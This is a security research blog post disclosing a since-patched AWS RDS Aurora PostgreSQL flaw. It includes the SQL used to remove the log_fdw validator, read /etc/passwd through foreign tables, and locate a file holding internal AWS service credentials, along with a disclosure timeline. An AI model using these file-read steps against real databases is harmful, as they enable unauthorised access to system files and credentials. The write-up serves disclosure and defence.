Tools Resources

AWS RDS Vulnerability Leads to AWS Internal Service Credentials

author_profile
Gafnit Amiga
Monday, Apr 11th, 2022

TL; DR

Panoptica's Research Team obtained credentials to an internal AWS service by exploiting a local file read vulnerability on the RDS EC2 instance using the log_fdw extension. The internal AWS service was connected to AWS internal account, related to the RDS service.

The vulnerability was reported to AWS Security team, who right after applied an initial patch limited only to the recent RDS and Aurora PostgreSQL engines, excluding older versions.

Following the patch, the RDS team has personally reached out to every customer that used a vulnerable version in the last months and guided them through the upgrade process to ensure mitigation. Recently, the AWS team has confirmed that the vulnerability has been fixed and that no customers were affected.

You are probably already familiar with what Amazon RDS is. But just in a few words, Amazon Relational Database Service (RDS) is a managed database service that supports several different database engines such as MariaDB, MySQL, and the subject of this post: PostgreSQL. AWS also maintains their own database engine, Amazon Aurora, which has compatibility with PostgreSQL and MySQL.

Exploration

I created an Amazon RDS database instance using the Amazon Aurora PostgreSQL engine and connected to the database using psql. I began with some basic exploration of the databases and pre-loaded roles.

Amazon RDS database
Amazon RDS database

Note that the “postgres” user is not a real superuser, it is a rds_superuser.

AWS documentation describes the role as “The rds_superuser role is a predefined Amazon RDS role similar to the PostgreSQL superuser role (customarily named postgres in local instances), but with some restrictions.”

Obviously this rds_superuser cannot run system commands, read local files or do any action related to the underline machine. Otherwise, it was too easy ���

Below is a screenshot detailing failed actions taken while attempting to use the rds_superuser role.

The rds_superuser role

So, I thought about using an untrusted language to create a function that can execute system commands, but I couldn’t load untrusted languages such as plperlu or plpythonu.

The rds_superuser role
 plperlu or plpythonu

The returned error suggested having a look at the rds.extensions configuration parameter.

The rds.extensions configuration parameter

While many language extensions are supported by Amazon RDS for PostgreSQL engines, none of them were an untrusted language. Therefore, I decided to do some further analysis and research on the extensions hoping to find a lead.

The log_fdw Extension

The log_fdw extension is supported by Amazon RDS for PostgreSQL engines of versions 9.6.2 and higher. This extension enables the user to access the database engine log using a SQL interface and build foreign tables with the logs data neatly split into several columns.

I followed the documentation and created the foreign server and table.

1. Get the log_fdw extension and create the log server as a foreign data wrapper.

CREATE EXTENSION log_fdw;
CREATE SERVER log_server FOREIGN DATA WRAPPER log_fdw;
SELECT * FROM list_postgres_log_files() order by 1;

The log_fdw Extension

2. Select a log file, create a table and read its content.

SELECT create_foreign_table_for_log_file(‘my_postgres_error_log’, ‘log_server’, ‘postgresql.log’);

SELECT * FROM my_postgres_error_log;

The log_fdw Extension

The first thing that comes to mind is to attempt a path traversal. The screenshots below show the attempt at it.

SELECT create_foreign_table_for_log_file(‘my_postgres_error_log’, ‘log_server’, ‘../../../../../etc/passwd’);

The log_fdw Extension

Upon executing the command, I received the following exception: “Error: The log file path specified was invalid.”
I was wondering if the error happened because of the relative path or because of some validation function. To check that I tried another relative path which is less categorized as a malicious pattern.

SELECT create_foreign_table_for_log_file(‘my_postgres_error_log’, ‘log_server’, ‘./postgresql.log’);

The log_fdw Extension
The log_fdw Extension

It is clearly a validation function.

Understanding PostgreSQL Foreign Data

PostgreSQL allows access to data that resides outside of PostgreSQL using regular SQL queries. Such data is referred to as foreign data and is accessed with help from a foreign data wrapper. A foreign data wrapper is a library (usually written in C) that can communicate with an external data source, such as a file, and can obtain data from it.

The author of a foreign data wrapper needs to implement 2 functions:

  1. handler function – triggers the action of fetching the external data
  2. validator function (optional) – responsible for validating options given to the foreign data wrapper, as well as options for the foreign server and foreign tables

Once the functions are created, the user can create a foreign data wrapper.

Understanding PostgreSQL Foreign Data

The user also needs to create a foreign server, which defines how to connect to a particular external data source.

Understanding PostgreSQL Foreign Data

Then, the user needs to create a foreign table, which defines the structure of the external data.

foreign table

All operations on a foreign data table are handled through its associated foreign data wrapper.

AWS created a custom foreign data wrapper for log_fwd with both a handler function and a validator function.

SELECT * FROM pg_foreign_data_wrapper;

AWS created a custom foreign data wrapper for log_fwd

Bypassing the log_fdw Extension Validation

Back to the path traversal... The validation can happen in the validator function, the handler function, or both. Since the validator function is optional, you can drop it without damaging the functionality.

ALTER FOREIGN DATA WRAPPER log_fdw NO VALIDATOR;

Bypassing the log_fdw Extension Validation

Now we check to see if the traversal will work …

SELECT create_foreign_table_for_log_file(‘my_postgres_error_log’, ‘log_server’, ‘../../../../../etc/passwd’);

SELECT * FROM my_postgres_error_log;

my_postgres_error_log

It did!!! There is no validation in the handler function.

As the traversal is not really needed anymore, the table can be created directly:

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename ‘/etc/passwd’);

SELECT * FROM demo;

CREATE FOREIGN TABL

Discovering AWS Internal Service Access Token

I spent some time going over system files until I found an interesting argument in the PostgreSQL config file that wasn’t shown through using psql.

The PostgreSQL configuration file is located at “/rdsdbdata/config/postgresql.conf”. Here is the output of the configuration file.

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename ‘/rdsdbdata/config/postgresql.conf’); SELECT * FROM demo;

Discovering AWS Internal Service Access Token

The screenshot below highlights the interesting argument of “apg_storage_conf_file” which points to another configuration file with the name "grover_volume.conf".

grover_volume.conf

I don’t know what ”grover” means, but let’s have a look on the file’s content.

Here is the output from reading the content of “/rdsdbdata/config/grover_volume.conf “.

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename ‘/rdsdbdata/config/grover_volume.conf’); SELECT * FROM demo;

CREATE FOREIGN TABLE

The file content points to another file at “/tmp/csd-grover-credentials.json”. Let’s have a look at the file’s content (hoping not to be redirected to another file again 😅).

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename ‘/tmp/csd-grover-credentials.json’); SELECT * FROM demo;

SERVER log_server OPTIONS

The file includes a temporary credentials of type “CSD_GROVER_API_CREDENTIALS”. The “publicKey” and the “privateKey” values looks like STS “AccessKeyId” and “SecretAccessKey” respectively. The signs that suggest this are the “publicKey” prefix of “ASIA” (as specified in the Unique Identifiers section of the AWS IAM User Guide) and the additional “token” parameter.

This was validated by exporting the Access Key, Secret Access Key, and Session Token to my environment and using the AWS Security Token Service’s (STS) GetCallerIdentity API which returns the User ID, Account ID, and Amazon Resource Name (ARN) of the currently used IAM credentials. From the ARN, we can see the assumed role name is “csd-grover-role” in AWS’ internal account.

csd-grover-role

Within transiting three different files I was able to discover an internal AWS service and gain access to it. This is where my analysis and research ended, I did not attempt to enumerate any IAM permissions or move further laterally into AWS’ internal environment.

AWS’ internal environment

AWS Mitigation and Investigation

We reported about this vulnerability to AWS security team, and they released a fix for the latest engine version within few days. AWS security team did an investigation to validate that this vulnerability was not exploited previously by someone else and confirmed that.

As for Grover, AWS are not able to disclose details about the internal service.

Timeline

Dec 09, 2021: Vulnerability was reported to AWS security.

Dec 09, 2021: AWS confirming the vulnerability and began with remediation and investigation.

Dec 14, 2021: AWS deployed the Initial patch, updating that they are working on a full fix.

Mar 22, 2022: AWS confirmed that they reached out to all affected customers and fixed all current supported versions.

Conclusion

The AWS Cloud is a blessing for many developers, architects, and security professionals around the world due to its pay-as-you-go model and diversity of service offerings. However, like any service provider, wrapping third-party services such as PostgreSQL and trying to provide users with advanced features is sometimes a double-edged sword.

Update 2022-04-11: Since publishing our post, AWS has released a Security Bulletin related to this finding https://aws.amazon.com/security/security-bulletins/AWS-2022-004/

Popup Image